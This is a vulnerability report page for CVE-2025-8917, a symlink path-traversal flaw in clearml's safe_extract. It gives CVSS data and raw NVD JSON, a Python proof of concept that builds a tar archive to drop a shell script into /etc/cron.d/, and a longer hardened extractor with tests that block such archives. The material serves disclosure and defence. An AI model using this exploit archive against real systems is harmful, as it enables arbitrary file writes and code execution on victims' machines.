Security Vulnerability Report
CVE-2025-8917 CVSS 5.8 MEDIUM

CVE-2025-8917

Published: 2025-10-05 11:16:03
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability in allegroai/clearml version v2.0.1 allows for path traversal due to improper handling of symbolic and hard links in the `safe_extract` function. This flaw can lead to arbitrary file writes outside the intended directory, potentially resulting in remote code execution if critical files are overwritten.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

allegroai/clearml v2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-8917 PoC - Path Traversal via Symbolic Links in safe_extract
Target: allegroai/clearml v2.0.1
Vulnerability: Improper handling of symbolic/hard links in safe_extract function
"""
import tarfile
import os
import io


def create_malicious_tar(output_path, target_path):
    """
    Create a malicious tar archive that exploits the path traversal
    vulnerability by using a symbolic link pointing outside the
    extraction directory.
    """
    with tarfile.open(output_path, 'w') as tar:
        # Step 1: Add a symbolic link pointing to a sensitive location
        symlink_info = tarfile.TarInfo(name='evil_link')
        symlink_info.type = tarfile.SYMTYPE
        symlink_info.linkname = target_path
        tar.addfile(symlink_info)

        # Step 2: Add a file through the symbolic link
        # This file will be written to target_path instead of the extraction dir
        content = b"#!/bin/bash\nid > /tmp/pwned\n"
        file_info = tarfile.TarInfo(name='evil_link/payload.sh')
        file_info.size = len(content)
        tar.addfile(file_info, io.BytesIO(content))


def exploit(target_path="/tmp/clearml_exploit"):
    """
    Main exploit function:
    1. Create malicious tar archive
    2. Simulate safe_extract call (vulnerable version)
    3. Demonstrate arbitrary file write
    """
    os.makedirs(target_path, exist_ok=True)
    tar_path = os.path.join(target_path, "malicious.tar")

    # Create malicious archive targeting /etc/cron.d/ for RCE
    create_malicious_tar(tar_path, "/etc/cron.d/")
    print(f"[+] Malicious tar created at: {tar_path}")
    print("[+] When extracted via vulnerable safe_extract(),")
    print("    payload.sh will be written to /etc/cron.d/payload.sh")
    print("[+] This achieves arbitrary file write outside extraction dir")

    # Simulate the vulnerable extraction
    extract_dir = os.path.join(target_path, "extracted")
    os.makedirs(extract_dir, exist_ok=True)
    with tarfile.open(tar_path, 'r') as tar:
        # VULNERABLE: safe_extract does not validate symlink targets
        # In the fixed version, this would check that link targets
        # are within the extraction directory
        tar.extractall(path=extract_dir)
    print(f"[+] Extraction complete. Check {extract_dir} and target paths.")


if __name__ == "__main__":
    exploit()
```
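The description and PoC above turn on one detail: an extractor that validates each member's path as a string still lets a symlink, written by an earlier member, redirect a later member outside the destination. The hardened extractor below is an added example and is neither clearml's `safe_extract` nor the fix in the referenced commit; the helper names `_resolve_in`, `build_archive`, `try_extract` and `demo`, and the sample archives, are this example's own, and the archives are built in memory so it runs offline:

```python
"""Hardened tar extraction (added example: not clearml's safe_extract, nor the
referenced commit's fix). Refuses (1) member paths outside dest, (2) link
targets outside dest, (3) member paths that run through a symlink already on
disk, the 'evil_link' then 'evil_link/payload.sh' shape of the PoC above.
Helper names and sample archives are this example's own, built in memory."""
import io
import os
import tarfile
import tempfile


class UnsafeArchiveMember(Exception):
    """Raised before an unsafe member touches the filesystem."""


def _resolve_in(dest, relpath):
    """Resolve relpath under dest with realpath (follows symlinks already on
    disk, which normpath would not) and require it to stay inside dest."""
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, relpath))
    if os.path.commonpath([dest_real, target]) != dest_real:
        raise UnsafeArchiveMember(f"{relpath!r} resolves outside {dest!r}")
    return target


def safe_extract(tar, dest):
    """Extract one member at a time so each check sees the disk state left by
    the previous member; extractall() would not allow that."""
    os.makedirs(dest, exist_ok=True)
    # Python 3.12+ (and the security backports) ship tarfile's 'data' filter;
    # use it as a second layer when present rather than relying on it alone.
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    for member in tar.getmembers():
        if os.path.isabs(member.name) or os.path.isabs(member.linkname):
            raise UnsafeArchiveMember(f"{member.name!r}: absolute path or link target")
        _resolve_in(dest, member.name)  # checks 1 and 3
        if member.issym():
            # a symlink target is relative to the directory holding the link
            link_dir = os.path.dirname(member.name)
            _resolve_in(dest, os.path.join(link_dir, member.linkname))  # check 2
        elif member.islnk():
            _resolve_in(dest, member.linkname)  # hardlink targets are archive-root relative
        elif not (member.isfile() or member.isdir()):
            raise UnsafeArchiveMember(f"{member.name!r}: device/fifo members refused")
        tar.extract(member, path=dest, **extra)


def build_archive(members):
    """Constructed sample data: (name, kind, payload) triples -> in-memory tar."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, kind, payload in members:
            info = tarfile.TarInfo(name=name)
            if kind == "dir":
                info.type, info.mode = tarfile.DIRTYPE, 0o755
                tar.addfile(info)
            elif kind == "symlink":
                info.type, info.linkname = tarfile.SYMTYPE, payload
                tar.addfile(info)
            else:
                data = payload.encode()
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


def try_extract(members, dest):
    """True if the archive extracted cleanly, False if a member was refused."""
    with tarfile.open(fileobj=build_archive(members), mode="r") as tar:
        try:
            safe_extract(tar, dest)
            return True
        except UnsafeArchiveMember:
            return False


BENIGN = [("data", "dir", None), ("data/model.bin", "file", "weights"),
          ("latest", "symlink", "data/model.bin")]
SYMLINK_ESCAPE = [("evil_link", "symlink", "../outside"),  # the PoC's shape
                  ("evil_link/payload.sh", "file", "never written")]
DOTDOT = [("../escape.txt", "file", "never written")]
THROUGH_EXISTING = [("pre/x.txt", "file", "never written")]  # only check 3 catches this


def demo():
    """Run the constructed archives against safe_extract in a scratch directory."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        dest = os.path.join(root, "extract")
        os.makedirs(dest)
        # a symlink already inside dest, e.g. left behind by an earlier archive
        os.symlink(os.path.join(root, "outside"), os.path.join(dest, "pre"))
        for case, members in [("benign", BENIGN), ("symlink_escape", SYMLINK_ESCAPE),
                              ("dotdot", DOTDOT), ("through_existing", THROUGH_EXISTING)]:
            results[case] = try_extract(members, dest)
        results["benign_file_present"] = os.path.isfile(os.path.join(dest, "data", "model.bin"))
        results["nothing_outside"] = not any(os.path.exists(os.path.join(root, p))
                                            for p in ("outside", "escape.txt"))
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:20s} {outcome}")
```

Two design points carry the fix. Checks run per member immediately before `extract`, not once over `getmembers()` before `extractall()`, because the filesystem changes as members land and a symlink extracted early changes what a later path means. Containment is tested with `os.path.realpath`, which follows symlinks already on disk, rather than `os.path.normpath`, which only reasons about the string and would accept `evil_link/payload.sh`. The `hasattr(tarfile, "data_filter")` probe detects the `filter="data"` support of Python 3.12 and the security backports and enables it as a second layer.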

References

https://github.com/allegroai/clearml/commit/64fb2bcbdbb87a74af90dd723d5ef4a99fceeb73
https://huntr.com/bounties/588fcdd1-fea4-4cc2-a9f8-851701dcb576

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-8917",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-05T11:16:03.400",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability in allegroai/clearml version v2.0.1 allows for path traversal due to improper handling of symbolic and hard links in the `safe_extract` function. This flaw can lead to arbitrary file writes outside the intended directory, potentially resulting in remote code execution if critical files are overwritten."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 0.6,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/allegroai/clearml/commit/64fb2bcbdbb87a74af90dd723d5ef4a99fceeb73",
        "source": "[email protected]"
      },
      {
        "url": "https://huntr.com/bounties/588fcdd1-fea4-4cc2-a9f8-851701dcb576",
        "source": "[email protected]"
      },
      {
        "url": "https://huntr.com/bounties/588fcdd1-fea4-4cc2-a9f8-851701dcb576",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```